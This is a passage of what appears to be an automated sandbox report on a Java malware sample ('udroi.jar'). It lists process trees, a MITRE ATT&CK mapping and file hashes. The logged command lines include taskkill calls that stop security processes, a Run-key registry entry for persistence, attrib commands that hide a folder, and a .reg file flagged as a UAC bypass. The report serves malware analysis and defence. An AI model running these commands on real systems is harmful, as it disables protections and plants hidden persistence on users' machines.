    taskkill /IM quamgr.exe /T /F
    3⤵
    PID:5340
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM quamgr.exe /T /F
    3⤵
    PID:6424
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM schmgr.exe /T /F
    3⤵
    PID:5864
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM schmgr.exe /T /F
    3⤵
    PID:6108
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM twsscan.exe /T /F
    3⤵
    PID:1536
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM twssrv.exe /T /F
    3⤵
    PID:2988
- - C:\Windows\SYSTEM32\taskkill.exe
    taskkill /IM UserReg.exe /T /F
    3⤵
    PID:6336

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:3412
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.55507127103932618084630606804188634.class
  2⤵
  - Drops file in System32 directory
  PID:3988
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2067089085946062299.vbs
    3⤵
    PID:3976
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2067089085946062299.vbs
      4⤵
      PID:1476
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive42407399042982046.vbs
    3⤵
    PID:4872
  - - C:\Windows\system32\cscript.exe
      cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive42407399042982046.vbs
      4⤵
      PID:6752
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe
    3⤵
    PID:1876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1213431138058640678.vbs
  2⤵
  PID:1788
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1213431138058640678.vbs
    3⤵
    PID:4800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1723304275249251612.vbs
  2⤵
  PID:1336
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1723304275249251612.vbs
    3⤵
    PID:6904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4076
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:3588
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:7152
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:6200
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:6400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Retrive1213431138058640678.vbs"
1⤵
PID:6160

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:2692
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.306101064815773265899384588608117236.class
  2⤵
  PID:7000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive6270345871317373888.vbs
  2⤵
  PID:620
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive6270345871317373888.vbs
    3⤵
    PID:5628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4083411685302574903.vbs
  2⤵
  PID:636
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4083411685302574903.vbs
    3⤵
    PID:6952
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3756
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:4888
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:6716
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:6988
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:6404

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:6728
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.349605093730415937984041470684348646.class
  2⤵
  PID:1804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive451222896291957951.vbs
  2⤵
  PID:5500
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive451222896291957951.vbs
    3⤵
    PID:6672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8365061401998818516.vbs
  2⤵
  PID:7120
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8365061401998818516.vbs
    3⤵
    PID:1992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4416
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:808
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:3064
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:6992
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:5852

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
PID:1216

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:376
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.227995973641139775857157429770107262.class
  2⤵
  PID:1476
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7648390942660241380.vbs
  2⤵
  PID:1168
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7648390942660241380.vbs
    3⤵
    PID:5368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive298578865026253803.vbs
  2⤵
  PID:4232
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive298578865026253803.vbs
    3⤵
    PID:6884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:864
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:6196
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:6208
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:60
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:1768

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
PID:5152

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
1⤵
- Drops file in System32 directory
PID:6092
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.52011439079603865615436358094786310.class
  2⤵
  PID:2092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4396775449589429835.vbs
  2⤵
  PID:4284
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4396775449589429835.vbs
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3909768823780956429.vbs
  2⤵
  PID:5444
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3909768823780956429.vbs
    3⤵
    PID:3048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:3976
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:1188
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:1476
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:1168

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
- Drops file in System32 directory
PID:864
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.83614392807023333081606293954205260.class
  2⤵
  PID:1784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3816200088543485263.vbs
  2⤵
  PID:5668
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3816200088543485263.vbs
    3⤵
    PID:4928
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7936585193873385837.vbs
  2⤵
  PID:2680
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7936585193873385837.vbs
    3⤵
    PID:6540
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:6040
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:5036
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:5948
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:6724
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:5284

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:6148

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
- Drops file in System32 directory
PID:6996
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.6374993496060123142440825409195674.class
  2⤵
  PID:1688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3846039948312267427.vbs
  2⤵
  PID:1560
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive3846039948312267427.vbs
    3⤵
    PID:1804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive9214318790177994783.vbs
  2⤵
  PID:6204
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive9214318790177994783.vbs
    3⤵
    PID:2832
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:6672
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:5128
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:6524
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:6712
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:4844

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:3440

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:2912

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:1156

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:5684

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:5632

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:6520

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:5644

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:6216

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:5544

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:4800

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:4992

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:3512

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:7020

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
- Drops file in System32 directory
PID:5728
- C:\Program Files\Java\jre-1.8\bin\java.exe
  "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.116507639437142157898466442567166169.class
  2⤵
  PID:3664
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2630243505335890123.vbs
  2⤵
  PID:2764
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive2630243505335890123.vbs
    3⤵
    PID:2368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8075345196550672191.vbs
  2⤵
  PID:1876
- - C:\Windows\system32\cscript.exe
    cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive8075345196550672191.vbs
    3⤵
    PID:2740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:6520
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
  2⤵
  - Views/modifies file attributes
  PID:6612
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h "C:\Users\Admin\JbWWIoBadTZ"
  2⤵
  - Views/modifies file attributes
  PID:7136
- C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
  2⤵
  - Executes dropped EXE
  PID:1536

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:6608

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:2044

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\udroi.jar"
1⤵
PID:6156

C:\Windows\regedit.exe
"regedit.exe" "C:\Users\Admin\AppData\Local\Temp\WHAbDWueHH10071306042193275.reg"
1⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Runs .reg file with regedit
PID:5416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:1688

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\test.txt
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:6460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

Filesize
46B

MD5
ab0b5b35577e4c13d4e2fe87ea88a041

SHA1
b6ff6fbaab10289dd580b24a8e9fc7316b70e0e6

SHA256
88387eca093cbddc9b7ab42c88f8fc66ebc7adb600bfe6bd5d5a758096148088

SHA512
0e7cef286d4f3ba3193213966e56abff3ce3b5c807beec36ff7c606f1894ba136c40be8e6971743373421300148d5edae1ae356e250b26507f7e6da3e2a7b372

Download Submit
C:\ProgramData\Oracle\Java\.oracle_jre_usage\50569f7db71fa7f8.timestamp

Filesize
54B

MD5
d106575f745476807f09ded6efbf0d4f

SHA1
608229b214bab95938809e42b1499a300bb13c05

SHA256
697e22b59388a73faf91af6411e912f5a8ee27ba0699faaf2d6f2554d9214054

SHA512
33122f6cfb61135488280548d91ae4f9308f23978281a511cab6f9bc1ac325466626e223d410d08d16ff8bd5532c50a9fd96fd99036e873004e869caa265ce0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\96a95977-1851-4a16-83af-1256a164c4a5.tmp

Filesize
8KB

MD5
85b4b2401232178d2b8accb4fd692303

SHA1
5c754395d86393e2afc8050d578454335fbe39dd

SHA256
584a71dfa4c4ac007946c56f4e4c07f045ab49cb8ec917df1e09295bbfebe24d

SHA512
68ee4d049152d3e00cd075c9eadbd8467485c348e94b8668e7ed062bad29359dffb178772366e9f5989c93163ecfac0995efc76b888f517c1e6b8ed2793a6972

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
24KB

MD5
87c2b09a983584b04a63f3ff44064d64

SHA1
8796d5ef1ad1196309ef582cecef3ab95db27043

SHA256
d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0

SHA512
df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

Filesize
69KB

MD5
921df38cecd4019512bbc90523bd5df5

SHA1
5bf380ffb3a385b734b70486afcfc493462eceec

SHA256
83289571497cbf2f2859d8308982493a9c92baa23bebfb41ceed584e3a6f8f3f

SHA512
35fa5f8559570af719f8a56854d6184daa7ef218d38c257e1ad71209272d37355e9ad93aaa9fbe7e3b0a9b8b46dfc9085879b01ce7bb86dd9308d4a6f35f09e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
328KB

MD5
15b07d0834be5ce9e1fa1265079859a1

SHA1
9aae71abb06cd4554a594f88b09f52f6629ffdc8

SHA256
870ca3db53a1372427fe59c45385d6ab7916ce1cfe21ddd48bc6631e45318f73

SHA512
36d2fddbcc3c5322ed37e5c8c8292b9a52c96ac2c301776b5dad08eb8e4c80f5f565c850cb5cb70498565903c3828c0ff1f4620f33540fe645e58ce258579449

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

Filesize
105KB

MD5
9ba9f4f275359419a4ab05dffaf4a37c

SHA1
3e0c4592e16949a717d377fc84518f6dbcc53b56

SHA256
ed0b8a6a89f1b257aeef24ecdc6270e7521aaa03d06f684a2acf7ff98d43f9ac

SHA512
f6a475c8294077fa81fb3dabf5284bca15f282dfa77dd9a0a78cf9326315b1eb349abd8f47862a539168349db0ddcfa2e118605799b2ef56c985da3d6d974a29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

Filesize
204KB

MD5
081c4aa5292d279891a28a6520fdc047

SHA1
c3dbb6c15f3555487c7b327f4f62235ddb568b84

SHA256
12cc87773068d1cd7105463287447561740be1cf4caefd563d0664da1f5f995f

SHA512
9a78ec4c2709c9f1b7e12fd9105552b1b5a2b033507de0c876d9a55d31678e6b81cec20e01cf0a9e536b013cdb862816601a79ce0a2bb92cb860d267501c0b69

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

Filesize
88KB

MD5
9de35116c75fd88fe7930c366d6c693a

SHA1
b73c48138662e26d6dabe8159204cfe5202b8343

SHA256
3417e3d988d95bac5eab6f6ee25d48157c9ea76e2f1a72509e3ca070efeaf288

SHA512
0a6422d007ae471ab079b5fbed245d4c17c7f665c1b590b8c32d437ab642e8c7e8a0656f84d71e0347eba4020b86692e407fb0f13977146e1badc1ba3a46a5a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

Filesize
71KB

MD5
e6ef8105e8bb2a8e7ba15d25ba533b18

SHA1
6f884ddbdfee25b067351c4301b39b255878240f

SHA256
f9b8694e12a454590dbf8982c0404d8de1f1c7518f3a57f92791a294d5ffc530

SHA512
a2cfec4d3bd39588c7c766bb8f85fa7d0fd983c18c0b7a98ef2b8e46be6b10bda5992ab76d59443b67f62f188d21c2a094b6f84eb053e81ecbd0b97f1bd04afb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
